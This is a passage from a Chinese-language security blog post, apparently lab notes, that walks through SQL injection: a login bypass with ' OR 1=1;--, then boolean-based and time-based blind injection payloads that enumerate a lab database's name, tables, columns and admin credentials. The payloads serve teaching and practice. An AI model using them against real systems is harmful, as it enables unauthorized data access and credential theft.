<p>要将其转换为始终返回 true 的查询，我们可以在 password 字段中输入以下内容：</p>
<p><code>' OR 1=1;--</code></p>
<p>这会将 SQL 查询转换为以下内容：</p>
<p><code>select * from users where username='' and password='' OR 1=1;</code></p>
<p>因为 1=1 是 true 语句，并且我们使用了 <strong>OR</strong> 运算符，所以这将始终导致查询返回 true，这满足 Web 应用程序逻辑，即数据库找到了有效的用户名/密码组合，并且应该允许访问。</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164540872.png"
	width="704"
	height="401"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164540872_hu_f7894b51de964a5b.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164540872_hu_10e61dff48569835.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="175"
		data-flex-basis="421px"
	
></p>
<h3 id="基于布尔盲注">基于布尔盲注
</h3><p>基于布尔值的 SQL 注入是指我们从注入尝试中收到的响应，可以是 true/false、yes/no、on/off、1/0 或任何只能有两个结果的响应。该结果确认了我们的 SQL Injection payload 成功或失败。在第一次检查时，您可能会觉得这种有限的回答无法提供太多信息。不过，仅通过这两个响应，就可以枚举整个数据库结构和内容。</p>
<h4 id="实际-1">实际：
</h4><p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164756211.png"
	width="714"
	height="600"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164756211_hu_253b239a58246ce7.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164756211_hu_4e3cbd4d8b6b40f0.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="119"
		data-flex-basis="285px"
	
></p>
<p>览器正文包含 <strong>{“taken”：true}</strong>。此 API 端点复制了许多订阅表单上的常见功能，该功能检查用户名是否已注册，以提示用户选择不同的用户名。 由于 <strong>taken</strong> 的值设置为 <strong>true</strong>，因此我们可以假设用户名 admin 已注册。我们可以通过将模拟浏览器地址栏中的用户名从 <strong>admin</strong> 更改为 <strong>admin123</strong> 来确认这一点，按下 Enter 键后，你会看到所采用的值 现在已更改为 false</p>
<p><code>select * from users where username = '%username%' LIMIT 1;</code></p>
<p>我们唯一可以控制的输入是查询字符串中的用户名，我们必须使用它来执行 SQL 注入。将用户名保持为 <strong>admin123</strong>，我们可以开始附加到此内容以尝试使数据库确认 true 内容，将 taken 字段的状态从 false 更改为 true。</p>
<p>与前面的级别一样，我们的第一个任务是建立 users&rsquo; 表中的列数，这可以通过使用 UNION 语句来实现。将 username 值更改为以下内容：</p>
<p><code>admin123' UNION SELECT 1;-- </code></p>
<p>由于 Web 应用程序已使用取为 false 的值 进行响应，因此我们可以确认这是不正确的列值。 继续添加更多列，直到我们得到 <strong>true</strong> <strong>的 taken</strong> 值 。您可以通过将 username 设置为以下值来确认答案为三列：</p>
<p><code>admin123' UNION SELECT 1,2,3;-- </code></p>
<p>在我们已经确定了列数，我们可以进行数据库的枚举。我们的第一个任务是发现数据库名称。我们可以通过使用内置的 <strong>database（）</strong> 方法，然后使用 <strong>like</strong> 运算符来尝试查找将返回 true 状态的结果。</p>
<p>尝试以下 username 值，看看会发生什么：</p>
<p><code>admin123' UNION SELECT 1,2,3 where database() like '%';--</code></p>
<p>我们得到一个 true 响应，因为在 like 运算符中，我们只有 % 的值 ，它将匹配任何内容，因为它是通配符值。如果我们将通配符运算符更改为 **a%，**您将看到响应返回 false，这确认数据库名称不以字母 <strong>a</strong> 开头。我们可以循环遍历所有字母、数字和字符，例如 - 和 _，直到找到匹配项。如果您将以下内容作为 username 值发送，您将收到一个 <strong>true</strong> 响应，确认数据库名称以字母 <strong>s</strong> 开头</p>
<p><code>admin123' UNION SELECT 1,2,3 where database() like 's%';--</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165301765.png"
	width="713"
	height="302"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165301765_hu_9de96fbaf5dca2b4.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165301765_hu_a26ad05a7d162cfb.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="236"
		data-flex-basis="566px"
	
></p>
<p>现在，您继续 数据库名称的下一个字符，直到找到另一个真实的响应，例如，&lsquo;sa%&rsquo;、&lsquo;sb%&rsquo;、&lsquo;sc%&rsquo; 等。继续此过程，直到发现数据库名称的所有字符，即 <strong>sqli_three</strong></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165348478.png"
	width="712"
	height="332"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165348478_hu_56c70d60b176fa67.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318165348478_hu_26b8c9b707aac09a.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="214"
		data-flex-basis="514px"
	
></p>
<p>我们已经建立了数据库名称，现在我们可以通过使用 information_schema 数据库使用类似的方法使用它来枚举表名。尝试将 username 设置为以下值：</p>
<p><code>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--</code></p>
<p>此查询在 <strong>tables</strong> 表中的 information_schema 数据库中 查找数据库名称与 sqli_three 匹配 且表名称以字母 a 开头的结果。 由于上述查询导致 <strong>false</strong> 响应，我们可以确认 sqli_three 数据库中没有以字母 a 开头的表。和以前一样，您需要在字母、数字和字符之间循环，直到找到正匹配项。</p>
<p>您最终会在 sqli_three 数据库中发现一个名为 users 的表，您可以通过运行以下 username payload 来确认该表：</p>
<p><code>admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--</code></p>
<p>最后，我们现在需要枚举 users 表中的列名 ，以便我们可以正确地搜索登录凭据。 同样，我们可以使用 information_schema 数据库和我们已经获得的信息来查询它的列名。使用下面的有效负载，我们搜索 columns 表，其中 database 等于 sqli_three，表名称为 users，列名称以字母 a 开头。</p>
<p><code>admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';</code></p>
<p>同样， 您需要在字母、数字和字符之间循环，直到找到匹配项。由于您要查找多个结果，因此每次找到新的列名称时，都必须将其添加到有效负载中，以避免发现相同的结果。例如，找到名为 id 的列后，将其附加到原始有效负载中（如下所示）。</p>
<p><code>admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';</code></p>
<p>重复此过程 3 次，您将发现列的 ID、用户名和密码。现在，您可以使用它来查询 <strong>users</strong> 表以获取登录凭据。首先，您需要找到一个有效的用户名，您可以使用下面的有效负载：</p>
<p><code>admin123' UNION SELECT 1,2,3 from users where username like 'a%</code></p>
<p><code>admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%</code></p>
<h3 id="基于时间的盲注">基于时间的盲注
</h3><p>基于时间的盲目 SQL 注入与上述基于 布尔值的盲注非常相似，因为发送的请求相同，但这次没有明显的查询是错还是对的指示。相反，正确查询的指标基于查询完成所需的时间。此时间延迟是使用内置方法（如 <strong>SLEEP（x）</strong> 和 UNION 语句引入的。SLEEP（） 方法只会在成功的 UNION SELECT 语句后执行。</p>
<h4 id="实际-2">实际：
</h4><p>因此，例如，在尝试建立表中的列数时，您将使用以下查询：</p>
<p><code>admin123' UNION SELECT SLEEP(5);--</code></p>
<p>如果响应时间没有暂停，则我们知道查询不成功，因此与之前的任务一样，我们添加另一列：</p>
<p><code>admin123' UNION SELECT SLEEP(5),2;--</code></p>
<p>有效负载应产生 5 秒的延迟，确认 UNION 语句成功执行，并且有两列。</p>
<p>按照布尔盲注的步骤，只是更改一下前面的语句，要改成sleep()形式</p>
<p>最后得到admin：4961</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318171316143.png"
	width="718"
	height="751"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318171316143_hu_cb7995221c6c5571.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318171316143_hu_66fc748ecc61b4ac.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="95"
		data-flex-basis="229px"
	
></p>

</section>


    <footer class="article-footer">
    

    </footer>


    
</article>

    

    

<aside class="related-content--wrapper">
    <h2 class="section-title">相关文章</h2>
    <div class="related-content">
        <div class="flex article-list--tile">
            
                
<article class="">
    <a href="/p/dns-%E8%AF%A6%E7%BB%86%E4%BF%A1%E6%81%AF/">
        
        

        <div class="article-details">
            <h2 class="article-title">DNS 详细信息</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/http-%E8%AF%A6%E7%BB%86%E4%BF%A1%E6%81%AF/">
        
        

        <div class="article-details">
            <h2 class="article-title">HTTP 详细信息</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E7%BB%95%E8%BF%87/">
        
        

        <div class="article-details">
            <h2 class="article-title">身份验证绕过</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/dom-%E6%96%87%E6%A1%A3%E5%AF%B9%E8%B1%A1%E6%A8%A1%E5%9E%8B/">
        
        

        <div class="article-details">
            <h2 class="article-title">DOM 文档对象模型</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E5%85%B3%E4%BA%8Exss%E5%9F%BA%E7%A1%80%E7%9A%84%E5%88%A9%E7%94%A8/">
        
        

        <div class="article-details">
            <h2 class="article-title">关于XSS基础的利用</h2>
        </div>
    </a>
</article>

            
        </div>
    </div>
</aside>

     
    
        
    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2024 - 
        
        2025 Yerucrem
    </section>
    
    <section class="powerby">
        使用 <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> 构建 <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.30.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.1e9a3bafd846ced4c345d084b355fb8c7bae75701c338f8a1f8a82c780137826.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
